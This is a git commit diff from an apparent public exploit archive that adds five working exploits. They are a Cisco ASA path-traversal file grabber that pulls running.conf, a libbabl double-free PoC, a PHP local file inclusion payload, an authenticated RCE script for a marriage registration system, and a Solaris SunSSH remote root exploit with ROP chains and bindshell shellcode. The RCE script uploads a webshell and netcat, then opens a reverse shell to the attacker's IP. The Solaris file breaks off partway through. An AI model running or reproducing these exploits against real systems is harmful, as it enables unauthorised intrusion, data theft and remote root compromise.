DB: 2020-12-16
5 changes to exploits/shellcodes libbabl 0.1.62 - Broken Double Free Detection (PoC) Solaris SunSSH 11.0 x86 - libpam Remote Root Task Management System 1.0 - 'page' Local File Inclusion Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated) Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
This commit is contained in:
parent
d7c025fc8d
commit
c487e85d00
6 changed files with 921 additions and 0 deletions
113
exploits/hardware/webapps/49262.py
Executable file
113
exploits/hardware/webapps/49262.py
Executable file
|
@ -0,0 +1,113 @@
|
|||
# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
|
||||
# Date: 12 Dec 2020
|
||||
# Exploit Author: Freakyclown@cygenta.co.uk
|
||||
# Vendor Homepage: cisco.com
|
||||
# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
|
||||
# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
|
||||
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
|
||||
# CVE : CVE-2020-3452
|
||||
# Github : https://github.com/cygenta/CVE-2020-3452
|
||||
|
||||
import requests
|
||||
|
||||
# Written by freakyclown for @CygentaHQ
|
||||
# Cisco ASA Path Traversal
|
||||
# CVE-2020-3452
|
||||
# Usage: CVE-2020-3452.py {target}"
|
||||
# Example: CVE-2020-3452.py 192.168.0.12"
|
||||
# Requires - Requests - pip3 install requests
|
||||
#
|
||||
# This tool takes advantage of the above cve and attempts to
|
||||
# download files as listed below, it is suggested that you make
|
||||
# a working folder for the outputfiles to avoid confusion if
|
||||
# attacking mutliple ASA's
|
||||
|
||||
# set your target
|
||||
target = input("Enter target IP/Url: ")
|
||||
|
||||
|
||||
def grabstuff():
|
||||
for file in files:
|
||||
print("trying: ", file)
|
||||
|
||||
#set request parameters
|
||||
params = (
|
||||
('type', 'mst'),
|
||||
('textdomain', '+CSCOE+/'+file),
|
||||
('default-language', ''),
|
||||
('lang', '../'),
|
||||
)
|
||||
|
||||
# set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
|
||||
response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
|
||||
# write the file to the disk
|
||||
f = open(file,"w")
|
||||
f.write(response.text)
|
||||
f.close()
|
||||
|
||||
|
||||
|
||||
# this is a list of files available to download, more will be added in time
|
||||
# if anyone has a list of ASA files, I'd be happy to add here
|
||||
files = {
|
||||
"sess_update.html",
|
||||
"blank.html",
|
||||
"noportal.html",
|
||||
"portal_ce.html",
|
||||
"portal.html",
|
||||
"logon_custom.css",
|
||||
"svc.html",
|
||||
"logo.gif",
|
||||
"portal_inc.lua",
|
||||
"nostcaccess.html",
|
||||
"session.js",
|
||||
"portal.js",
|
||||
"portal_custom.css",
|
||||
"running.conf",
|
||||
"tlbrportal_forms.js",
|
||||
"logon_forms.js",
|
||||
"win.js",
|
||||
"portal.css",
|
||||
"lced.html",
|
||||
"pluginlib.js",
|
||||
"useralert.html",
|
||||
"ping.html",
|
||||
"app_index.html",
|
||||
"shshimdo_url",
|
||||
"session_password.html",
|
||||
"relayjar.html",
|
||||
"relayocx.html",
|
||||
"color_picker.js",
|
||||
"color_picker.html",
|
||||
"cedhelp.html",
|
||||
"cedmain.html",
|
||||
"cedlogon.html",
|
||||
"cedportal.html",
|
||||
"portal_elements.html",
|
||||
"commonspawn.js",
|
||||
"common.js",
|
||||
"appstart.js",
|
||||
"relaymonjar.html",
|
||||
"relaymonocx.html",
|
||||
"cedsave.html",
|
||||
"tunnel_linux.jnlp",
|
||||
"ask.html",
|
||||
"no_svc.html",
|
||||
"preview.html",
|
||||
"cedf.html",
|
||||
"ced.html",
|
||||
"logon_redirect.html",
|
||||
"logout.html",
|
||||
"tunnel_mac.jnlp",
|
||||
"gp-gip.html",
|
||||
"auth.html",
|
||||
"wrong_url.html",
|
||||
"logon.html"}
|
||||
|
||||
|
||||
# obvious thing is obvious, try the things and barf if fail
|
||||
try:
|
||||
grabstuff()
|
||||
except Exception as err:
|
||||
print("Something went wrong sorry")
|
||||
print(err)
|
57
exploits/linux/local/49259.c
Normal file
57
exploits/linux/local/49259.c
Normal file
|
@ -0,0 +1,57 @@
|
|||
# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
|
||||
# Date: December 14, 2020
|
||||
# Exploit Author: Carter Yagemann
|
||||
# Vendor Homepage: https://www.gegl.org
|
||||
# Software Link: https://www.gegl.org/babl/
|
||||
# Version: libbabl 0.1.62 and newer
|
||||
# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
|
||||
# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c
|
||||
|
||||
/*
|
||||
* Babl has an interesting way of managing buffers allocated and freed using babl_malloc()
|
||||
* and babl_free(). This is the structure of its allocations (taken from babl-memory.c):
|
||||
*
|
||||
* typedef struct
|
||||
* {
|
||||
* char *signature;
|
||||
* size_t size;
|
||||
* int (*destructor)(void *ptr);
|
||||
* } BablAllocInfo;
|
||||
*
|
||||
*
|
||||
* signature is used to track whether a chunk was allocated by babl, and if so, whether
|
||||
* it is currently allocated or freed. This is done by either pointing it to the global
|
||||
* string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).
|
||||
*
|
||||
* Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173):
|
||||
*
|
||||
* void
|
||||
* babl_free (void *ptr,
|
||||
* ...)
|
||||
* {
|
||||
* ...
|
||||
* if (freed == BAI (ptr)->signature)
|
||||
* fprintf (stderr, "\nbabl:double free detected\n");
|
||||
*
|
||||
*
|
||||
* Or so the developers think. As it turns out, because babl internally uses libc's malloc()
|
||||
* and free(), which has its own data that it stores within freed chunks, most systems will
|
||||
* overwrite babl's signature variable upon freeing, breaking the double free detection.
|
||||
* The simple PoC below demonstrates this:
|
||||
*/
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
|
||||
#include <babl/babl-memory.h>
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
void *buf = babl_malloc(42);
|
||||
babl_free(buf);
|
||||
// BUG: reports an "unknown" pointer warning when the following is clea=
|
||||
rly a double free
|
||||
babl_free(buf);
|
||||
|
||||
return 0;
|
||||
}
|
26
exploits/php/webapps/49258.txt
Normal file
26
exploits/php/webapps/49258.txt
Normal file
|
@ -0,0 +1,26 @@
|
|||
# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
|
||||
# Exploit Author: İsmail BOZKURT
|
||||
# Date: 2020-12-15
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
|
||||
# Affected Version: Version 1
|
||||
# Category: Web Application
|
||||
# Tested on: Windows 10 x86_64
|
||||
|
||||
Step 1. Log into application with credentials
|
||||
Step 2. Click on Branch
|
||||
Step 3. Select New Branch http://127.0.0.1/index.php?page=index
|
||||
Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00
|
||||
|
||||
Note: php version < 5.3.3
|
||||
|
||||
section class="content">
|
||||
<div class="container-fluid">
|
||||
<?php
|
||||
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
|
||||
if(!file_exists($page.".php")){
|
||||
include '404.html';
|
||||
}else{
|
||||
include $page.'.php';
|
||||
}
|
||||
?>
|
128
exploits/php/webapps/49260.py
Executable file
128
exploits/php/webapps/49260.py
Executable file
|
@ -0,0 +1,128 @@
|
|||
# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-14-12
|
||||
# Exploit Author: Andrea Bruschi - www.andreabruschi.net
|
||||
# Vendor Homepage: https://phpgurukul.com/
|
||||
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
|
||||
# Version: 1.0
|
||||
# Tested on: Windows 10 / Xampp Server and Wamp Server
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
import requests
|
||||
import sys
|
||||
import os
|
||||
import iterm2
|
||||
import AppKit
|
||||
|
||||
url = sys.argv[1]
|
||||
mobile = sys.argv[2]
|
||||
password = sys.argv[3]
|
||||
|
||||
# CONFIGURE HERE
|
||||
reverse_ip = '192.168.xx.xx'
|
||||
reverse_port = 4444
|
||||
|
||||
# CONFIGURE HERE
|
||||
# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
|
||||
netcat_path = '/local/path/to/nc.exe'
|
||||
shell_path = '/local/path/to/shell.php'
|
||||
|
||||
|
||||
def login(url, mobile, password):
|
||||
|
||||
url = "{}/user/login.php".format(url)
|
||||
payload = {'mobno':mobile, 'password':password, 'login':''}
|
||||
req = requests.post(url, data=payload)
|
||||
cookie = req.cookies['PHPSESSID']
|
||||
|
||||
return cookie
|
||||
|
||||
|
||||
def upload(url, cookie, file=None):
|
||||
|
||||
f = open(file, 'rb')
|
||||
filename, ext = os.path.splitext(file)
|
||||
|
||||
if "exe" in ext:
|
||||
content_type = 'application/octet-stream'
|
||||
else:
|
||||
content_type = 'application/x-php'
|
||||
|
||||
cookie = {'PHPSESSID':cookie}
|
||||
url = "{}/user/marriage-reg-form.php".format(url)
|
||||
|
||||
files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
|
||||
payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
|
||||
req = requests.post(url, data=payload, cookies=cookie, files=files)
|
||||
print(f'[+] File {ext} uploaded')
|
||||
|
||||
|
||||
def get_remote_file(url, ext):
|
||||
|
||||
url = "{}/user/images".format(url)
|
||||
req = requests.get(url)
|
||||
junk = req.text.split(ext)[0]
|
||||
f = junk[-42:] + ext
|
||||
|
||||
return f
|
||||
|
||||
|
||||
def persistence(url, webshell, netcat):
|
||||
|
||||
# webshell
|
||||
payload_w = "copy /y {} shell.php".format(webshell)
|
||||
url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
|
||||
req_w = requests.get(url_w)
|
||||
|
||||
# netcat
|
||||
payload_n = "copy /y {} nc.exe".format(netcat)
|
||||
url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
|
||||
req_n= requests.get(url_n)
|
||||
|
||||
print('[+] Persistence enabled')
|
||||
|
||||
|
||||
def get_reverse(url, ip, port):
|
||||
|
||||
payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
|
||||
url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
|
||||
print('[+] Reverse shell incoming!')
|
||||
req = requests.get(url_r)
|
||||
|
||||
|
||||
# CONFIGURE HERE
|
||||
# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
|
||||
# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
|
||||
def start_listener(port):
|
||||
|
||||
# Launch the app
|
||||
AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")
|
||||
|
||||
async def main(connection):
|
||||
app = await iterm2.async_get_app(connection)
|
||||
window = app.current_window
|
||||
if window is not None:
|
||||
cmd = "nc -lnv {}".format(port)
|
||||
await window.async_create_tab(command=cmd)
|
||||
else:
|
||||
print("No current window")
|
||||
|
||||
iterm2.run_until_complete(main)
|
||||
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
if len(sys.argv < 3):
|
||||
print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
|
||||
else:
|
||||
cookie = login(url, mobile, password)
|
||||
upload(url, cookie, netcat_path)
|
||||
upload(url, cookie, shell_path)
|
||||
webshell = get_remote_file(url, '.php')
|
||||
netcat = get_remote_file(url, '.exe')
|
||||
persistence(url, webshell, netcat)
|
||||
|
||||
start_listener(reverse_port)
|
||||
get_reverse(url, reverse_ip, reverse_port)
|
592
exploits/solaris/remote/49261.c
Normal file
592
exploits/solaris/remote/49261.c
Normal file
|
@ -0,0 +1,592 @@
|
|||
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root
|
||||
# Exploit Author: Hacker Fantastic
|
||||
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html
|
||||
# Version: 11
|
||||
# Tested on: SunOS solaris 5.11 11.0
|
||||
|
||||
/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
|
||||
* ====================================================================
|
||||
* Makefile
|
||||
* all: hfsunsshdx
|
||||
*
|
||||
* hfsunsshdx: main.c
|
||||
* gcc main.c -o hfsunsshdx -lssh2
|
||||
*
|
||||
* clean:
|
||||
* rm -rf hfsunsshdx
|
||||
* rm -rf core.*
|
||||
*
|
||||
* A trivial to reach stack-based buffer overflow is present in libpam on
|
||||
* Solaris. The vulnerable code exists in pam_framework.c parse_user_name()
|
||||
* which allocates a fixed size buffer of 512 bytes on the stack and parses
|
||||
* usernames into the buffer via modules (authtok_get) without bounds checks.
|
||||
* This issue can be reached remotely pre-authentication via SunSSH when
|
||||
* "keyboard-interactive" is enabled to use PAM based authentication. The
|
||||
* vulnerability was discovered being actively exploited by FireEye in the
|
||||
* wild and is part of an APT toolkit called "EVILSUN". The vulnerability
|
||||
* is present in both SPARC/x86 versions of Solaris & others (eg. illumos).
|
||||
* This exploit uses ROP gadgets to disable nxstack through mprotect on x86
|
||||
* and a helper shellcode stub. The configuration in a default Solaris
|
||||
* install is vulnerable. The exploit makes use of libssh2 and tested on
|
||||
* Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable
|
||||
* SunSSH implementation and versions later than 11.1 have updated SunSSH
|
||||
* code that prevents the issue being triggered.
|
||||
*
|
||||
* e.g.
|
||||
* ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2
|
||||
* [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
|
||||
* [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86'
|
||||
* [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes
|
||||
* [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e
|
||||
* [+] entering keyboard-interactive authentication.
|
||||
* [-] number of prompts: 1
|
||||
* [-] prompt 0 from server: 'Please enter user name: '
|
||||
* [-] shellcode length 193 bytes
|
||||
* [-] rop chain length 68
|
||||
* [-] exploit buffer length 580
|
||||
* [-] sending exploit magic buffer... wait
|
||||
* [+] exploit success, handling payload...
|
||||
* [-] connected.. enjoy :)
|
||||
* SunOS solaris 5.11 11.0 i86pc i386 i86pc
|
||||
* 6:49pm up 53 min(s), 1 user, load average: 0.01, 0.01, 0.01
|
||||
* helpdesk console Nov 27 17:57
|
||||
* uid=0(root) gid=0(root)
|
||||
*
|
||||
* -- Hacker Fantastic (https://hacker.house)
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <ctype.h>
|
||||
#include <getopt.h>
|
||||
#include <time.h>
|
||||
#include <signal.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <sys/select.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <sys/time.h>
|
||||
#include <libssh2.h>
|
||||
|
||||
int sd = -1;
|
||||
int oldsd = -1;
|
||||
int ishell = -1;
|
||||
char* buf;
|
||||
char* payload;
|
||||
char* retaddr;
|
||||
struct sockaddr_in sain;
|
||||
|
||||
struct target {
|
||||
char* name;
|
||||
char* ropchain;
|
||||
};
|
||||
|
||||
struct shellcode {
|
||||
char* name;
|
||||
char* shellcode;
|
||||
};
|
||||
|
||||
void spawn_shell(int);
|
||||
void bindshell_setup(short);
|
||||
void on_alarm(int);
|
||||
void on_interupt(int);
|
||||
void prepare_payload();
|
||||
|
||||
const int targetno = 5;
|
||||
struct target targets[] = {
|
||||
{"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86",
|
||||
"\x41\x42\x43\x44" // %ebx
|
||||
"\x45\x46\x47\x48" // %esi
|
||||
"\x50\x51\x52\x53" // %ebp
|
||||
"\xa7\x0e\x06\x08" // pop %ecx, pop %edx, pop %ebp
|
||||
"\x9c\x3e\x04\x08" // ptr to (0x?, 0x?, 0x8044cf0, 0x7)
|
||||
"\x01\x01\x04\x08" // %edx unused, must be writeable addr
|
||||
"\x41\x42\x43\x44" // %ebp unused var
|
||||
"\x93\xdb\xc8\xfe" // pop %edx ; ret
|
||||
"\x01\x30\x04\x08" // ptr to 0x08043001 mprotect arg
|
||||
"\x1a\xe7\x0b\xfe" // dec %edx ; ret
|
||||
"\x79\x41\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret
|
||||
"\x93\xdb\xc8\xfe" // pop %edx ; ret
|
||||
"\x01\x30\x04\x08" // ptr to shellcode
|
||||
"\xe0\xe8\x3e\xfe" // mov $0x72,%al
|
||||
"\x64\x7c\xc3\xfe" // inc %eax ; ret
|
||||
"\x64\x7c\xc3\xfe" // inc %eax ; ret
|
||||
"\x22\x9d\xd3\xfe"},// sysenter
|
||||
{"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86",
|
||||
"\x41\x42\x43\x44" // %ebx overwrite unused
|
||||
"\x41\x42\x43\x44" // %esi overwrite unused
|
||||
"\xf8\x32\x04\x08" // %ebp overwrite unused
|
||||
"\xb7\xf9\x05\x08" // pop %ecx ; pop %edx ; pop %ebp ; ret
|
||||
"\x7e\x36\x02\x04" // ptr/2 to (0x?, 0x0, 0x1000, 0x7)
|
||||
"\x01\x30\x04\x08" // ptr for %edx
|
||||
"\x44\x43\x42\x41" // ptr for %ebp unused
|
||||
"\xe4\xd4\xde\xfe" // dec %edx ; add %ecx, %ecx ; ret
|
||||
"\x19\x42\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret
|
||||
"\xb8\xf9\x05\x08" // pop %edx ; pop %ebp ; ret
|
||||
"\xeb\x30\x04\x08" // shellcode ptr for %edx
|
||||
"\x1c\x33\x04\x08" // %ebp & used by "leave"
|
||||
"\x84\x98\x51\xfe" // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret
|
||||
"\x41\x42\x43\x44" // %esi unused
|
||||
"\xe0\x30\x04\x08" // shellcode ptr to %ebx
|
||||
"\xe8\x32\x04\x08" // ptr into %ebp
|
||||
"\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
|
||||
"\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
|
||||
"\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
|
||||
"\x11\x3f\xfe\xfe" // sub $0x2,%eax ; ret
|
||||
"\xfe\xf8\xcf\xfe"},// sysenter
|
||||
{"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86",
|
||||
"\xc3\x31\x04\x08" // overwrite %ebp unused
|
||||
"\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret
|
||||
"\x29\x28\x07\x08" // pop %ebx ; ret
|
||||
"\xf0\xff\xaf\xfe" // 0x0a writen to address, unused gadget
|
||||
"\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret
|
||||
"\x01\x30\x04\x08" // %edx pointer to page
|
||||
"\xb8\x31\x04\x08" // unused %ebp value
|
||||
"\xaa\x4c\x68\xfe" // pop %ecx ; ret
|
||||
"\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7)
|
||||
"\x61\x22\x07\x08" // dec %edx ; ret
|
||||
"\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret
|
||||
"\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret
|
||||
"\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret
|
||||
"\xc3\x31\x04\x08" // shellcode addr for %edx
|
||||
"\xc3\x31\x04\x08" // unused %ebp value
|
||||
"\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx)
|
||||
{"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86",
|
||||
"\xc3\x31\x04\x08" // overwrite %ebp unused
|
||||
"\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret
|
||||
"\xb1\x26\x07\x08" // pop %ebx ; ret
|
||||
"\xff\x01\xac\xfe" // write garbage here, unused gadget
|
||||
"\x98\xb9\x05\x08" // pop %edx ; pop %ebp ; ret
|
||||
"\xff\x2f\x04\x08" // %edx pointer to page
|
||||
"\xc3\x31\x04\x08" // unused %ebp value
|
||||
"\x57\xaa\xe4\xfe" // pop %ecx ; ret
|
||||
"\x94\x11\x5f\xfe" // ptr rwx (0x?,0x04b,0xe50,0x7)
|
||||
"\xee\x6a\x65\xfe" // inc %edx ; ret
|
||||
"\x9b\xc5\xc1\xfe" // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret
|
||||
"\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret
|
||||
"\x86\xae\xe5\xfe" // pop %edx ; ret
|
||||
"\xc3\x31\x04\x08" // shellcode return address for %edx
|
||||
"\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx)
|
||||
{"Solaris all Sun_SSH_1.x.x debug crash target",
|
||||
"\x41\x42\x43\x43" // %ebp ptr
|
||||
"\x78\x79\x80\x81"} // %eip ptr
|
||||
};
|
||||
|
||||
const int shellno = 4;
|
||||
|
||||
struct shellcode shellcodes[] = {
|
||||
{"Solaris x86 bindshell tcp port 9999",
|
||||
/* mprotect magic stub necessary for payloads expecting +x stack */
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
|
||||
"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
|
||||
"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
|
||||
/* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07);
|
||||
==================================================================
|
||||
xorl %eax, %eax
|
||||
xorl %ecx, %ecx
|
||||
movl $0x08041001, %ebx
|
||||
movw $0x7001, %ax
|
||||
movb $0x7,%cl
|
||||
dec %ebx
|
||||
dec %eax
|
||||
pushl %ecx
|
||||
pushl %eax
|
||||
pushl %ebx
|
||||
pushl %ebx
|
||||
movl %esp, %ecx
|
||||
xorl %eax, %eax
|
||||
movb $0x74, %al
|
||||
int $0x91
|
||||
*/
|
||||
/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */
|
||||
"\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde"
|
||||
"\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e"
|
||||
"\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69"
|
||||
"\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
|
||||
"\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
|
||||
"\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
|
||||
"\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
|
||||
"\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
|
||||
"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
|
||||
"\xb1\x3a\xfe\xd7\x2a\x95"},
|
||||
{"Solaris x86 bindshell tcp port 8080",
|
||||
/* mprotect magic stub necessary for payloads expecting +x stack */
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
|
||||
"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
|
||||
"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
|
||||
/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */
|
||||
"\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde"
|
||||
"\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e"
|
||||
"\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69"
|
||||
"\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
|
||||
"\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
|
||||
"\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
|
||||
"\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
|
||||
"\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
|
||||
"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
|
||||
"\xb1\x3a\xfe\xd7\x44\x60"},
|
||||
/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
|
||||
{"Solaris 11.0 x86 bindshell tcp port 9999",
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
|
||||
"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
|
||||
"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
|
||||
"\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
|
||||
"\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd"
|
||||
"\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6"
|
||||
"\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c"
|
||||
"\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7"
|
||||
"\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35"
|
||||
"\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72"
|
||||
"\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97"
|
||||
"\x9f\x56\x1b\x2c\xdf\x8f"},
|
||||
/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
|
||||
{"Solaris 11.0 x86 bindshell tcp port 4444",
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
"\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
|
||||
"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
|
||||
"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
|
||||
"\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
|
||||
"\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1"
|
||||
"\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2"
|
||||
"\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46"
|
||||
"\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47"
|
||||
"\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae"
|
||||
"\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5"
|
||||
"\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0"
|
||||
"\x0a\x39\x6b\xeb\x53\x6b"}
|
||||
};
|
||||
|
||||
void spawn_shell(int sd) {
|
||||
#define sockbuflen 2048
|
||||
int rcv;
|
||||
char sockbuf[sockbuflen];
|
||||
fd_set readfds;
|
||||
